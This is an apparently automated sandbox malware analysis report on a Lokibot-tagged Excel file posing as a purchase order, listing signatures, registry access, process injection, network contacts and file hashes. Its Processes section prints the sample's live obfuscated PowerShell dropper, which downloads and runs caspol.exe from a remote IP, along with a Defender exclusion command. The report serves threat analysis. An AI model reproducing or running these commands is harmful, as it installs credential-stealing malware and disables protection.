Malware Analysis Report

2025-04-03 09:49

Sample ID 241119-kq3lwasnhx
Target 19112024_0849_18112024_PO-000041492.xls
SHA256 555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

555c9fab8b1c2180ec0c140d7ef7a072d3848661e47051b4dda5de40a61465b7

Threat Level: Known bad

The file 19112024_0849_18112024_PO-000041492.xls was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Process spawned unexpected child process

Lokibot family

Lokibot

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

outlook_office_path

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

outlook_win_path

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-19 08:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-19 08:49

Reported

2024-11-19 08:54

Platform

win7-20240903-en

Max time kernel

285s

Max time network

295s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1660 set thread context of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2760 wrote to memory of 2568 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2760 wrote to memory of 2568 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2760 wrote to memory of 2568 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2760 wrote to memory of 2568 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
PID 2568 wrote to memory of 2276 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2276 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2276 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2276 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 264 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2568 wrote to memory of 264 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2568 wrote to memory of 264 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2568 wrote to memory of 264 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 264 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 264 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 264 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 264 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2568 wrote to memory of 1660 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2568 wrote to memory of 1660 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2568 wrote to memory of 1660 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2568 wrote to memory of 1660 N/A C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 444 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 444 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 444 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 444 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 1660 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE

"C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fmw0hx7y.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC65C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC64B.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.134.89:80 e6.o.lencr.org tcp
US 66.63.187.231:80 66.63.187.231 tcp
DE 5.45.108.48:443 link.uebie.de tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.83:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp

Files

memory/2004-1-0x0000000071F3D000-0x0000000071F48000-memory.dmp

memory/2004-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2760-16-0x0000000000FD0000-0x0000000000FD2000-memory.dmp

memory/2004-17-0x0000000002DE0000-0x0000000002DE2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B083487247EB8FBD76503EF0DA269B6B

MD5 19441ff3417824165292902a45b2b1a0
SHA1 d540476ed095e25dcde39c9fda6377cf8eabdb00
SHA256 76a89a769b67f8f4d4f9c0086311f804fe47473f0f631c67052dc27d4c485eaf
SHA512 98f2849a2ff381580d0a2e3f1cf4800a745fd61ae5a3078c9e6c64332efe30154143705541cacd9cea0099de66775aaf5c89b1c75ce3652257e08ecca692406f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 0a378af2d086b23d27752d0b437d21c5
SHA1 606aa2e0be67c4ef5e913f543c7fd3503b8405bc
SHA256 22ae1cb7c6414df525a67ed498e2356e90d769f06a669477378d7644c7649b30
SHA512 aa3f99a1ed6adb91a8975dbcb9491d858fb04db0d35d582530c31c947072ce6996eeda96222d55320f1a9da9b3019d80f437a07b594217dd6da8f92c446ee1cf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B083487247EB8FBD76503EF0DA269B6B

MD5 21df645ec13368af70d0fdc697fd5359
SHA1 5b82ae15964e432a108cdcaff6577f97a3fa282c
SHA256 ab8079f4c308128ed7c6149a31e451702426eb988972368078d420cb490b0ec2
SHA512 29c1ad99095fb83110e4aa0d34bc6229aba1d15f30aaf5971228d9a03a032dc83d5232e13923b776a67f0419e7eeb5e684cff95b10c9aa2443653779909cc1d0

C:\Users\Admin\AppData\Local\Temp\CabBC2E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor[1].hta

MD5 db21eb9cf86a8314900d693c5a40c4e9
SHA1 1dd5c5e45f4c0224a6c4f4ce443bcb542fc5913c
SHA256 da1ae3eef8260a07b09c7978317fed23be8c431f2620629a9bc3f170df113102
SHA512 b589c6d47dd7dc29d3e8e6823c68966ee388d5e78fbc5b300abd38829443889591efe774564c861349dcad7b1981f9317b60fb1c19a3b232f12c64e403783f2c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 de3896007a0ce7fe6d44eb1ff9929bdb
SHA1 19d77f34ea9f482d9d2361300297614678d5892a
SHA256 2b0baba624c1062db007046379c4594b36fdf0ea94e75cb63e11d30dedb0c13c
SHA512 4375b9ce461f3e482aca91111fb70c844c3fdb83085167fd4b5572c8c9c2e152625c8e76e1c1672accf4f193853310df6a5bb75e77f8f45646fd7f30be6c90d9

\??\c:\Users\Admin\AppData\Local\Temp\fmw0hx7y.cmdline

MD5 813ed3d19f0980c53e9f13189f90d5c8
SHA1 0b930b3827bf97455f21d098223210668fab6a33
SHA256 ce9980bf0841e99e39685df06e4e5d70a4b10c363c5f9ee97e70fc260caa2132
SHA512 34ae88e47482b7c3e2a9cfd91347da3895330a733aab35439c6bf1eeaae29140fe57e5777fc0433adde1297f8b2b79028ea70bc82b056d1617562630dab5633a

\??\c:\Users\Admin\AppData\Local\Temp\fmw0hx7y.0.cs

MD5 f97fc8141f59078b4354b513d3b083ac
SHA1 293904ab8d5f38a2f0764ee2e35e97e590d8c737
SHA256 f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e
SHA512 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

\??\c:\Users\Admin\AppData\Local\Temp\CSCC64B.tmp

MD5 b87615cee40c4877b9d70368fd1d19eb
SHA1 da5fece3588786c71a0135363c01c33771e78214
SHA256 fd1b4fd86d41992253cb9d3b79b13d46e49c3d819561da0d9e5d8c2f22a3706d
SHA512 1affaaf736ddec655c5fc18fdf42ac7998b575151471e02228840bc93cd81b80ac637b7fe1451964bd852260dba44ec2134b8d14d0fd19ee41fe42330a95e52a

C:\Users\Admin\AppData\Local\Temp\RESC65C.tmp

MD5 cc80a1b90c410b05a64883887d9fbd12
SHA1 23adb91480fd45e77b55193518fbf46eb0ca8d2a
SHA256 52fc88503e68a6084f9d205052dd19199cf26c53e3b9213619ce16cbf0fdd57a
SHA512 b5e3a0964829f7fc012270ac8c15addb56bdb69b03bdf22cf6bd505b2bce360321ad530f606e8c313ff5d8822a433dd48b63fc3241c6fb8585e31a5438ce6669

C:\Users\Admin\AppData\Local\Temp\fmw0hx7y.dll

MD5 77e1e8bb36d4d55c8fa5c7d1f042e9eb
SHA1 9ab6241aca8b3800ec7fc8a501aaf4665734dccf
SHA256 c682a3088d132b66aec3ebd4686b4b3d80851edd01ef2bd17e062a8c074554dd
SHA512 4d9b232c71e127ac0d7e2ab8330230c13725ed1a5f415c2de581911072bf343cd86c4773221727389970f2152a17234dbe5dcc836f39959638188b937085cb64

C:\Users\Admin\AppData\Local\Temp\fmw0hx7y.pdb

MD5 712cb33ce82633f3e103b7a7f6eb71a3
SHA1 78093c425b42c7125cd16809603c766e54fb08d1
SHA256 e1642ca5e9766b52bc9f9b0cef73cab7ccb9241f332eebaf905a7ec80703fba4
SHA512 24caae7bc7240e8a38d3d7a16df5ccf52511f07c60e65ec3f8cc64229ef2eccf39cf00327a42011a2b1d9f0c3fca1fa2e1d2f8d49742016d613e16872513fb47

memory/2004-60-0x0000000071F3D000-0x0000000071F48000-memory.dmp

C:\Users\Admin\AppData\Roaming\caspol.exe

MD5 759dd13715bc424308f1d0032ac4b502
SHA1 03347c96c50c140192e8df70260d732bea301ebc
SHA256 d4c86776bcf1dc4ffd2f51538f3e342216314b76cdba2c2864193350654a9aca
SHA512 4197992f4b44ea45c91cb00c7308949560ae24d179e9a14ebc4efb27e1b20abae203b1c8756c211eb9aab9732a3fd04c824bd6bc92510c8de3caea3a8cfa8e55

memory/1660-70-0x00000000011A0000-0x0000000001224000-memory.dmp

memory/1660-71-0x0000000000430000-0x0000000000442000-memory.dmp

memory/1660-72-0x00000000008B0000-0x0000000000914000-memory.dmp

memory/1664-73-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-83-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1664-86-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-84-0x0000000000400000-0x00000000004A2000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1664-75-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-81-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-79-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/1664-77-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

memory/1664-112-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2872745919-2748461613-2989606286-1000\0f5007522459c86e95ffcc62f32308f1_4d69f9e1-559c-46cf-82ac-67913db47c55

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/1664-120-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-19 08:49

Reported

2024-11-19 08:54

Platform

win10v2004-20241007-en

Max time kernel

299s

Max time network

207s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\19112024_0849_18112024_PO-000041492.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
